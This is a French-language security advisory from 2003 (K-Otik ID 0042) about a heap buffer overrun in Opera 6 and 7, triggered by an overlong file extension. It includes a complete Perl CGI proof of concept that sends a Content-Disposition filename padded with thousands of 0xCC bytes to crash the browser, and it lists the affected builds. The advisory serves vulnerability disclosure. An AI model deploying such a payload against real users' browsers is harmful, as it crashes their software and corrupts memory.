Date de Publication: 2003-04-29
 Titre: Opera 7-6 Long File Extension Heap Buffer Overrun
 K-Otik ID : 0042
 Exploitable à distance : Non
 Exploitable en local : Oui

 
 * Description Technique - Exploit *
 
Opéra ne vérifie pas correctement la longueur des extensions et ne limite pas cette longueur. Ce qui produit un recouvrement par des données arbitraires, et donc le crash.

---------------------------  Sample Script  --------------------------
  #!/usr/bin/perl
  # Smash Heap Memory.
  # This script is CGI program.

  $|=1;
  my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

  print "Content-type: text/html\r\n";
  print qq~Content-Disposition: filename="$filename"\r\n~;
  print "\r\n";
  print "<html><body>Love & Peace :)</body></html>\r\n";
-------------------------------------------------------------------------


  * Versions Vulnérables *
 
Plateforme : Windows
7.10 build 2840
7.03 build 2670
7.02 build 2668
7.02 bork build 2656b
7.01 build 2651
6.06b build 1145
6.06 build 1144
6.05 build 1140


  * Solution *
 
http://www.opera.com

  * Crédits *
 
Faille découverte par l'équipe de Operash (Avril 2003).